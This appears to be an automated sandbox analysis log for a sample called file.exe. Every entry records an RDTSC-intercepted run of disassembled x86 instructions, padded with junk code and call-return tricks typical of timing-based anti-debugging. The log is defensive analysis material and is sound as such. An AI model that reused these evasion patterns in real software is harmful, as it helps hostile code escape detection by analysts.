Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C43094 second address: C4309A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C443A6 second address: C44425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FC41CC2F0D8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov esi, dword ptr [ebp+122D38CEh] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007FC41CC2F0C8h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D31AEh], ebx 0x0000003a xchg eax, ebx 0x0000003b js 00007FC41CC2F0DFh 0x00000041 jmp 00007FC41CC2F0D9h 0x00000046 push eax 0x00000047 push esi 0x00000048 jl 00007FC41CC2F0CCh 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4587C second address: C4591B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jmp 00007FC41CDAB674h 0x00000010 pop esi 0x00000011 nop 0x00000012 and esi, dword ptr [ebp+122D3816h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FC41CDAB668h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov esi, dword ptr [ebp+1244885Ah] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007FC41CDAB668h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 mov edi, 6197DE59h 0x0000005b push eax 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FC41CDAB66Fh 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4591B second address: C45926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C46330 second address: C46391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB673h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b or cx, 2ECAh 0x00000010 mov dx, FD95h 0x00000014 popad 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FC41CDAB668h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 push 00000000h 0x00000033 xchg eax, ebx 0x00000034 jmp 00007FC41CDAB66Fh 0x00000039 push eax 0x0000003a push ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C46C45 second address: C46C5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007FC41CC2F0E3h 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007FC41CC2F0C6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4E127 second address: C4E142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC41CDAB674h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4A4BD second address: C4A4C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4A4C2 second address: C4A4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C50121 second address: C501B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007FC41CC2F0C6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FC41CC2F0CCh 0x00000014 pop edx 0x00000015 nop 0x00000016 mov ebx, dword ptr [ebp+1244885Ah] 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FC41CC2F0C8h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 movzx edi, bx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edx 0x00000040 call 00007FC41CC2F0C8h 0x00000045 pop edx 0x00000046 mov dword ptr [esp+04h], edx 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc edx 0x00000053 push edx 0x00000054 ret 0x00000055 pop edx 0x00000056 ret 0x00000057 or bh, FFFFFF9Ch 0x0000005a xchg eax, esi 0x0000005b jmp 00007FC41CC2F0CEh 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 push edx 0x00000065 pop edx 0x00000066 jmp 00007FC41CC2F0D4h 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C501B5 second address: C501BA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C53275 second address: C53294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D3h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jng 00007FC41CC2F0C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C502BC second address: C502C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FC41CDAB666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C512BF second address: C512C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C502C6 second address: C502D7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC41CDAB666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C512C5 second address: C512C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C502D7 second address: C502E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C53813 second address: C53818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C502E0 second address: C5036A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC41CDAB666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c sbb edi, 54E52DB2h 0x00000012 push esi 0x00000013 mov ebx, edx 0x00000015 pop ebx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007FC41CDAB668h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 mov bl, E5h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 movzx edi, dx 0x00000043 sub dword ptr [ebp+122D3390h], eax 0x00000049 mov eax, dword ptr [ebp+122D01CDh] 0x0000004f push 00000000h 0x00000051 push esi 0x00000052 call 00007FC41CDAB668h 0x00000057 pop esi 0x00000058 mov dword ptr [esp+04h], esi 0x0000005c add dword ptr [esp+04h], 00000014h 0x00000064 inc esi 0x00000065 push esi 0x00000066 ret 0x00000067 pop esi 0x00000068 ret 0x00000069 mov edi, 72C017A6h 0x0000006e mov edi, dword ptr [ebp+122D36BEh] 0x00000074 push FFFFFFFFh 0x00000076 or bx, 7605h 0x0000007b nop 0x0000007c push eax 0x0000007d push edx 0x0000007e jo 00007FC41CDAB66Ch 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C53818 second address: C5381D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5036A second address: C5036E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5381D second address: C53891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D3089h] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FC41CC2F0C8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c add ebx, dword ptr [ebp+122D19E3h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007FC41CC2F0C8h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e jbe 00007FC41CC2F0CCh 0x00000054 sub dword ptr [ebp+1246B4B3h], edi 0x0000005a push eax 0x0000005b pushad 0x0000005c jmp 00007FC41CC2F0CCh 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C547CC second address: C547D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C547D2 second address: C547E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C56867 second address: C5686B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5686B second address: C56884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC41CC2F0CFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C56884 second address: C56903 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FC41CDAB668h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+12447BEAh] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007FC41CDAB668h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 mov di, FE00h 0x0000004b jmp 00007FC41CDAB674h 0x00000050 push 00000000h 0x00000052 mov edi, 5BAD9778h 0x00000057 mov edi, dword ptr [ebp+122D1B46h] 0x0000005d xchg eax, esi 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C56903 second address: C5690A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C539DD second address: C539E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55AC4 second address: C55ACE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC41CC2F0CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C59A3A second address: C59A89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB676h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D3417h], ecx 0x00000012 push 00000000h 0x00000014 add ebx, 54ED3621h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007FC41CDAB668h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a push esi 0x0000003b pop esi 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C57A0A second address: C57A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C57ADA second address: C57AF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58B93 second address: C58BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jno 00007FC41CC2F0D4h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58BB2 second address: C58BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5AC05 second address: C5AC4D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC41CC2F0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov ebx, 033635CCh 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 jg 00007FC41CC2F0DAh 0x0000001d pop eax 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007FC41CC2F0CFh 0x00000027 push esi 0x00000028 pop esi 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C59CAF second address: C59CB5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C59CB5 second address: C59CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5E714 second address: C5E728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB670h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5E728 second address: C5E72E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6412B second address: C6414A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC41CDAB666h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC41CDAB673h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6414A second address: C64152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C638AA second address: C638BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FC41CDAB666h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push ebx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C63A28 second address: C63A2E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C63A2E second address: C63A57 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FC41CDAB666h 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC41CDAB679h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C63A57 second address: C63A88 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC41CC2F0D2h 0x00000008 jp 00007FC41CC2F0C6h 0x0000000e jbe 00007FC41CC2F0C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC41CC2F0D5h 0x0000001b jno 00007FC41CC2F0C6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C63D1D second address: C63D3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB674h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C677DD second address: C677FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC41CC2F0D9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C677FF second address: C67829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CDAB66Ch 0x00000009 jmp 00007FC41CDAB678h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0470A second address: C0470E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C07D50 second address: C07D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C07D56 second address: C07D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C709A3 second address: C709AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFDC63 second address: BFDC6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74183 second address: C741B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 jbe 00007FC41CDAB671h 0x0000000d pop esi 0x0000000e push esi 0x0000000f jns 00007FC41CDAB679h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C748DA second address: C748E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C748E0 second address: C748E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C748E6 second address: C748EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74A6E second address: C74A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC41CDAB679h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74D63 second address: C74D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jc 00007FC41CC2F0E3h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC41CC2F0D1h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74ECD second address: C74ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74ED3 second address: C74EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC41CC2F0C6h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC41CC2F0CCh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74EED second address: C74EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74EF2 second address: C74F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CC2F0CCh 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007FC41CC2F0CCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C75060 second address: C75068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C75068 second address: C7506F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7506F second address: C7507F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC41CDAB668h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7977F second address: C79783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C79783 second address: C7978F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007FC41CDAB666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C011C7 second address: C011DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FC41CC2F0C8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C48089 second address: C4808D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4808D second address: C48093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C48093 second address: C4809D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC41CDAB666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4809D second address: C480BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC41CC2F0D2h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C480BA second address: C480BF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
